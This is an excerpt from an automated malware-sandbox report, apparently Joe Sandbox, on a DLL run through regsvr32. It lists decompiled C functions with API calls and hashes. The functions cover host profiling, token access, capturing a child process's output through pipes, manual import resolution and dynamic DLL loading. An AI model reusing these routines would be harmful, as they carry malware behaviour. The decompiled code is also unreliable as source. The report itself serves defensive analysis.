        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
        • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
        • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
        • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E100121FF(char* __eax, char** _a4, long long* _a8) {
        				char* _v8;
        				long long _v16;
        				char* _t9;
        				signed char _t11;
        				char** _t19;
        				char _t22;
        				long long _t32;
        				long long _t33;
        
        				_t9 = __eax;
        				L100122CD();
        				_t19 = _a4;
        				_t22 =  *__eax;
        				if( *_t22 != 0x2e) {
        					_t9 = strchr( *_t19, 0x2e);
        					if(_t9 != 0) {
        						 *_t9 =  *_t22;
        					}
        				}
        				L10012291();
        				 *_t9 =  *_t9 & 0x00000000;
        				_t11 = strtod( *_t19,  &_v8);
        				asm("fst qword [ebp-0xc]");
        				_t32 =  *0x10018250;
        				asm("fucomp st1");
        				asm("fnstsw ax");
        				if((_t11 & 0x00000044) != 0) {
        					L5:
        					st0 = _t32;
        					L10012291();
        					if( *_t11 != 0x22) {
        						_t33 = _v16;
        						goto L8;
        					} else {
        						return _t11 | 0xffffffff;
        					}
        				} else {
        					_t33 =  *0x10018258;
        					asm("fucomp st1");
        					asm("fnstsw ax");
        					if((_t11 & 0x00000044) != 0) {
        						L8:
        						 *_a8 = _t33;
        						return 0;
        					} else {
        						goto L5;
        					}
        				}
        			}












        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
        • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
        • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
        • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E1000CF84(void* __ecx) {
        				intOrPtr _t11;
        				long _t12;
        				intOrPtr _t17;
        				intOrPtr _t18;
        				struct _OSVERSIONINFOA* _t29;
        
        				_push(__ecx);
        				_t29 =  *0x1001e688; // 0x2120590
        				GetCurrentProcess();
        				_t11 = E1000BA05();
        				_t1 = _t29 + 0x1644; // 0x2121bd4
        				_t25 = _t1;
        				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
        				_t12 = GetModuleFileNameW(0, _t1, 0x105);
        				_t33 = _t12;
        				if(_t12 != 0) {
        					_t12 = E10008FBE(_t25, _t33);
        				}
        				_t3 = _t29 + 0x228; // 0x21207b8
        				 *(_t29 + 0x1854) = _t12;
        				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
        				memset(_t29, 0, 0x9c);
        				_t29->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t29);
        				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
        				_t17 = E1000E3B6(_t3);
        				_t7 = _t29 + 0x220; // 0x21207b0
        				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
        				_t18 = E1000E3F1(_t7);
        				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
        				return _t18;
        			}









        APIs
        • GetCurrentProcess.KERNEL32(?,?,02120590,?,10003545), ref: 1000CF90
        • GetModuleFileNameW.KERNEL32(00000000,02121BD4,00000105,?,?,02120590,?,10003545), ref: 1000CFB1
        • memset.MSVCRT ref: 1000CFE2
        • GetVersionExA.KERNEL32(02120590,02120590,?,10003545), ref: 1000CFED
        • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
        • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
        • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
        • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E1000B946(void* __ecx) {
        				void* _v8;
        				void* _t9;
        
        				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
        					_t9 = _v8;
        				} else {
        					_t9 = 0;
        				}
        				return _t9;
        			}

        APIs
        • GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
        • OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
        • GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
        • GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
        • OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CurrentOpenProcessThreadToken$ErrorLast
        • String ID:
        • API String ID: 102224034-0
        • Opcode ID: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
        • Instruction ID: 5b563ac24429287b405df7abe271a8f453b302f4379ab1304781a3c6047c2fee
        • Opcode Fuzzy Hash: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
        • Instruction Fuzzy Hash: 20F05E7150061AABFB41DFA48C49F5E73ACFB04280F018418F702D3054E670EF048761
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E1000A9B7(signed int __ecx) {
        				void* _v8;
        				void* _v12;
        				void* _v16;
        				void* _v20;
        				signed int _v24;
        				char _v28;
        				char _v32;
        				char _v36;
        				struct _SECURITY_ATTRIBUTES _v48;
        				intOrPtr _v60;
        				char _v64;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				void* _v84;
        				short _v92;
        				intOrPtr _v96;
        				void _v140;
        				intOrPtr _t77;
        				void* _t79;
        				intOrPtr _t85;
        				intOrPtr _t87;
        				intOrPtr _t89;
        				intOrPtr _t92;
        				intOrPtr _t98;
        				intOrPtr _t100;
        				intOrPtr _t102;
        				long _t111;
        				intOrPtr _t115;
        				intOrPtr _t126;
        				void* _t127;
        				void* _t128;
        				void* _t129;
        				void* _t130;
        
        				_t111 = 0;
        				_v24 = __ecx;
        				_v12 = 0;
        				_v20 = 0;
        				_t127 = 0;
        				_v8 = 0;
        				_v16 = 0;
        				_v48.nLength = 0xc;
        				_v48.lpSecurityDescriptor = 0;
        				_v48.bInheritHandle = 1;
        				_v28 = 0;
        				memset( &_v140, 0, 0x44);
        				asm("stosd");
        				_t130 = _t129 + 0xc;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
        					L18:
        					return 0;
        				}
        				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
        					L13:
        					E1000861A( &_v28, 0);
        					if(_v20 != 0) {
        						_t77 =  *0x1001e684; // 0x219faa0
        						 *((intOrPtr*)(_t77 + 0x30))(_v20);
        					}
        					if(_v8 != 0) {
        						_t115 =  *0x1001e684; // 0x219faa0
        						 *((intOrPtr*)(_t115 + 0x30))(_v8);
        					}
        					return _t111;
        				}
        				_t79 = _v16;
        				_v76 = _t79;
        				_v80 = _t79;
        				_v84 = _v12;
        				_v140 = 0x44;
        				_v96 = 0x101;
        				_v92 = 0;
        				_t126 = E10008604(0x1001);
        				_v28 = _t126;
        				if(_t126 == 0) {
        					goto L18;
        				}
        				_push( &_v64);
        				_push( &_v140);
        				_t85 =  *0x1001e684; // 0x219faa0
        				_push(0);
        				_push(0);
        				_push(0x8000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push(_v24);
        				_push(0);
        				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
        					goto L13;
        				}
        				_t87 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t87 + 0x30))(_v12);
        				_t89 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t89 + 0x30))(_v16);
        				_v24 = _v24 & 0;
        				do {
        					_t92 =  *0x1001e684; // 0x219faa0
        					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
        					 *((char*)(_v24 + _t126)) = 0;
        					if(_t111 == 0) {
        						_t127 = E100091A6(_t126, 0);
        					} else {
        						_push(0);
        						_push(_t126);
        						_v32 = _t127;
        						_t127 = E10009292(_t127);
        						E1000861A( &_v32, 0xffffffff);
        						_t130 = _t130 + 0x14;
        					}
        					_t111 = _t127;
        					_v32 = _t127;
        				} while (_v36 != 0);
        				_push( &_v36);
        				_push(E1000C379(_t127));
        				_t98 =  *0x1001e68c; // 0x219fc68
        				_push(_t127);
        				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
        					L12:
        					_t100 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t100 + 0x30))(_v64);
        					_t102 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t102 + 0x30))(_v60);
        					goto L13;
        				}
        				_t128 = E10009256(_t127);
        				if(_t128 == 0) {
        					goto L12;
        				}
        				E1000861A( &_v32, 0);
        				return _t128;
        			}

        APIs
        • memset.MSVCRT ref: 1000A9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
        • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
          • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocFreememset
        • String ID: D
        • API String ID: 488076629-2746444292
        • Opcode ID: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
        • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
        • Opcode Fuzzy Hash: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
        • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E1001249B(signed int __eax, intOrPtr _a4) {
        				intOrPtr* _v8;
        				signed int* _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				intOrPtr _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				struct HINSTANCE__* _v48;
        				intOrPtr _v52;
        				signed int _v56;
        				intOrPtr _v60;
        				signed int _v64;
        				signed int _t109;
        				signed int _t112;
        				signed int _t115;
        				void* _t163;
        
        				_v44 = _v44 & 0x00000000;
        				if(_a4 != 0) {
        					_v48 = GetModuleHandleA("kernel32.dll");
        					_v40 = E1000E099(_v48, "GetProcAddress");
        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        					_v32 = _v52;
        					_t109 = 8;
        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
        						L24:
        						return 0;
        					}
        					_v56 = 0x80000000;
        					_t112 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_v8 = _v8 + 0x14;
        					}
        					_t115 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
        						if(_v36 != 0) {
        							if( *_v8 == 0) {
        								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
        							} else {
        								_v12 =  *_v8 + _a4;
        							}
        							_v28 = _v28 & 0x00000000;
        							while( *_v12 != 0) {
        								_v24 = _v24 & 0x00000000;
        								_v16 = _v16 & 0x00000000;
        								_v64 = _v64 & 0x00000000;
        								_v20 = _v20 & 0x00000000;
        								if(( *_v12 & _v56) == 0) {
        									_v60 =  *_v12 + _a4;
        									_v20 = _v60 + 2;
        									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
        									_v16 = _v40(_v36, _v20);
        								} else {
        									_v24 =  *_v12;
        									_v20 = _v24 & 0x0000ffff;
        									_v16 = _v40(_v36, _v20);
        								}
        								if(_v24 != _v16) {
        									_v44 = _v44 + 1;
        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
        										 *_v12 = _v16;
        									} else {
        										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
        									}
        								}
        								_v12 =  &(_v12[1]);
        								_v28 = _v28 + 4;
        							}
        							_v8 = _v8 + 0x14;
        							continue;
        						}
        						_t163 = 0xfffffffd;
        						return _t163;
        					}
        					goto L24;
        				}
        				return __eax | 0xffffffff;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
        • LoadLibraryA.KERNEL32(00000000), ref: 10012551
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
        • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
        • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
        • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
        				char _v8;
        				char _v12;
        				void _v140;
        				signed char _t14;
        				char _t15;
        				intOrPtr _t20;
        				void* _t25;
        				intOrPtr _t26;
        				intOrPtr _t32;
        				WCHAR* _t34;
        				intOrPtr _t35;
        				struct HINSTANCE__* _t37;
        				int _t38;
        				intOrPtr _t46;
        				void* _t47;
        				intOrPtr _t50;
        				void* _t60;
        				void* _t61;
        				char _t62;
        				char* _t63;
        				void* _t65;
        				intOrPtr _t66;
        				char _t68;
        
        				_t65 = __esi;
        				_t61 = __edi;
        				_t47 = __ebx;
        				_t50 =  *0x1001e688; // 0x2120590
        				_t14 =  *(_t50 + 0x1898);
        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
        					_t15 = E100095E1(_t50, 0xb62);
        					_t66 =  *0x1001e688; // 0x2120590
        					_t62 = _t15;
        					_t67 = _t66 + 0xb0;
        					_v8 = _t62;
        					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
        					_t20 =  *0x1001e688; // 0x2120590
        					asm("sbb eax, eax");
        					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
        					_t63 = "\\";
        					_t26 =  *0x1001e688; // 0x2120590
        					_t68 = E100092E5(_t26 + 0x1020);
        					_v12 = _t68;
        					E100085D5( &_v8);
        					_t32 =  *0x1001e688; // 0x2120590
        					_t34 = E100092E5(_t32 + 0x122a);
        					 *0x1001e784 = _t34;
        					_t35 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
        					_t37 = LoadLibraryW( *0x1001e784);
        					 *0x1001e77c = _t37;
        					if(_t37 == 0) {
        						_t38 = 0;
        					} else {
        						_push(_t37);
        						_t60 = 0x28;
        						_t38 = E1000E171(0x1001bb48, _t60);
        					}
        					 *0x1001e780 = _t38;
        					E1000861A( &_v12, 0xfffffffe);
        					memset( &_v140, 0, 0x80);
        					if( *0x1001e780 != 0) {
        						goto L10;
        					} else {
        						E1000861A(0x1001e784, 0xfffffffe);
        						goto L8;
        					}
        				} else {
        					L8:
        					if( *0x1001e780 == 0) {
        						_t46 =  *0x1001e6bc; // 0x219fbc8
        						 *0x1001e780 = _t46;
        					}
        					L10:
        					return 1;
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
        • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
        • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
        • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E10012D70(int _a4, signed int _a8) {
        				int _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				void* __esi;
        				void* _t137;
        				signed int _t141;
        				intOrPtr* _t142;
        				signed int _t145;
        				signed int _t146;
        				intOrPtr _t151;
        				intOrPtr _t161;
        				intOrPtr _t162;
        				intOrPtr _t167;
        				intOrPtr _t170;
        				signed int _t172;
        				intOrPtr _t173;
        				int _t184;
        				intOrPtr _t185;
        				intOrPtr _t188;
        				signed int _t189;
        				void* _t195;
        				int _t202;
        				int _t208;
        				intOrPtr _t217;
        				signed int _t218;
        				int _t219;
        				intOrPtr _t220;
        				signed int _t221;
        				signed int _t222;
        				int _t224;
        				int _t225;
        				signed int _t227;
        				intOrPtr _t228;
        				int _t232;
        				int _t234;
        				signed int _t235;
        				int _t239;
        				void* _t240;
        				int _t245;
        				int _t252;
        				signed int _t253;
        				int _t254;
        				void* _t257;
        				void* _t258;
        				int _t259;
        				intOrPtr _t260;
        				int _t261;
        				signed int _t269;
        				signed int _t271;
        				intOrPtr* _t272;
        				void* _t273;
        
        				_t253 = _a8;
        				_t272 = _a4;
        				_t3 = _t272 + 0xc; // 0x452bf84d
        				_t4 = _t272 + 0x2c; // 0x8df075ff
        				_t228 =  *_t4;
        				_t137 =  *_t3 + 0xfffffffb;
        				_t229 =  <=  ? _t137 : _t228;
        				_v16 =  <=  ? _t137 : _t228;
        				_t269 = 0;
        				_a4 =  *((intOrPtr*)( *_t272 + 4));
        				asm("o16 nop [eax+eax]");
        				while(1) {
        					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
        					_t141 =  *_t8 + 0x2a >> 3;
        					_v12 = 0xffff;
        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
        					if(_t217 < _t141) {
        						break;
        					}
        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
        					_t12 = _t272 + 0x5c; // 0x84e85000
        					_t245 =  *_t11 -  *_t12;
        					_v8 = _t245;
        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
        					_t247 =  <  ? _t195 : _v12;
        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
        					if(_t227 >= _v16) {
        						L7:
        						if(_t253 != 4) {
        							L10:
        							_t269 = 0;
        							__eflags = 0;
        						} else {
        							_t285 = _t227 - _t195;
        							if(_t227 != _t195) {
        								goto L10;
        							} else {
        								_t269 = _t253 - 3;
        							}
        						}
        						E10015D90(_t272, _t272, 0, 0, _t269);
        						_t18 = _t272 + 0x14; // 0xc703f045
        						_t19 = _t272 + 8; // 0x8d000040
        						 *( *_t18 +  *_t19 - 4) = _t227;
        						_t22 = _t272 + 0x14; // 0xc703f045
        						_t23 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
        						_t26 = _t272 + 0x14; // 0xc703f045
        						_t27 = _t272 + 8; // 0x8d000040
        						 *( *_t26 +  *_t27 - 2) =  !_t227;
        						_t30 = _t272 + 0x14; // 0xc703f045
        						_t31 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
        						E10014AF0(_t285,  *_t272);
        						_t202 = _v8;
        						_t273 = _t273 + 0x14;
        						if(_t202 != 0) {
        							_t208 =  >  ? _t227 : _t202;
        							_v8 = _t208;
        							_t36 = _t272 + 0x38; // 0xf47d8bff
        							_t37 = _t272 + 0x5c; // 0x84e85000
        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
        							_t273 = _t273 + 0xc;
        							_t252 = _v8;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
        							_t227 = _t227 - _t252;
        						}
        						if(_t227 != 0) {
        							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
        							_t273 = _t273 + 0xc;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
        						}
        						_t253 = _a8;
        						if(_t269 == 0) {
        							continue;
        						}
        					} else {
        						if(_t227 != 0 || _t253 == 4) {
        							if(_t253 != 0 && _t227 == _t195) {
        								goto L7;
        							}
        						}
        					}
        					break;
        				}
        				_t142 =  *_t272;
        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
        				_a4 = _t232;
        				if(_t232 == 0) {
        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
        					_t254 =  *_t83;
        				} else {
        					_t59 = _t272 + 0x2c; // 0x8df075ff
        					_t224 =  *_t59;
        					if(_t232 < _t224) {
        						_t65 = _t272 + 0x3c; // 0x830cc483
        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
        						_t260 =  *_t66;
        						__eflags =  *_t65 - _t260 - _t232;
        						if( *_t65 - _t260 <= _t232) {
        							_t67 = _t272 + 0x38; // 0xf47d8bff
        							_t261 = _t260 - _t224;
        							 *(_t272 + 0x6c) = _t261;
        							memcpy( *_t67,  *_t67 + _t224, _t261);
        							_t70 = _t272 + 0x16b0; // 0xdf750008
        							_t188 =  *_t70;
        							_t273 = _t273 + 0xc;
        							_t232 = _a4;
        							__eflags = _t188 - 2;
        							if(_t188 < 2) {
        								_t189 = _t188 + 1;
        								__eflags = _t189;
        								 *(_t272 + 0x16b0) = _t189;
        							}
        						}
        						_t73 = _t272 + 0x38; // 0xf47d8bff
        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
        						_t225 = _a4;
        						_t273 = _t273 + 0xc;
        						_t76 = _t272 + 0x6c;
        						 *_t76 =  *(_t272 + 0x6c) + _t225;
        						__eflags =  *_t76;
        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
        						_t184 =  *_t78;
        						_t79 = _t272 + 0x2c; // 0x8df075ff
        						_t239 =  *_t79;
        					} else {
        						 *(_t272 + 0x16b0) = 2;
        						_t61 = _t272 + 0x38; // 0xf47d8bff
        						memcpy( *_t61,  *_t142 - _t224, _t224);
        						_t62 = _t272 + 0x2c; // 0x8df075ff
        						_t184 =  *_t62;
        						_t273 = _t273 + 0xc;
        						_t225 = _a4;
        						_t239 = _t184;
        						 *(_t272 + 0x6c) = _t184;
        					}
        					_t254 = _t184;
        					 *(_t272 + 0x5c) = _t184;
        					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
        					_t185 =  *_t81;
        					_t240 = _t239 - _t185;
        					_t241 =  <=  ? _t225 : _t240;
        					_t242 = ( <=  ? _t225 : _t240) + _t185;
        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
        				}
        				if( *(_t272 + 0x16c0) < _t254) {
        					 *(_t272 + 0x16c0) = _t254;
        				}
        				if(_t269 == 0) {
        					_t218 = _a8;
        					__eflags = _t218;
        					if(_t218 == 0) {
        						L34:
        						_t89 = _t272 + 0x3c; // 0x830cc483
        						_t219 =  *_t272;
        						_t145 =  *_t89 - _t254 - 1;
        						_a4 =  *_t272;
        						_t234 = _t254;
        						_v16 = _t145;
        						_v8 = _t254;
        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
        							_v8 = _t254;
        							_t95 = _t272 + 0x5c; // 0x84e85000
        							_a4 = _t219;
        							_t234 = _t254;
        							_t97 = _t272 + 0x2c; // 0x8df075ff
        							__eflags =  *_t95 -  *_t97;
        							if( *_t95 >=  *_t97) {
        								_t98 = _t272 + 0x2c; // 0x8df075ff
        								_t167 =  *_t98;
        								_t259 = _t254 - _t167;
        								_t99 = _t272 + 0x38; // 0xf47d8bff
        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
        								 *(_t272 + 0x6c) = _t259;
        								memcpy( *_t99, _t167 +  *_t99, _t259);
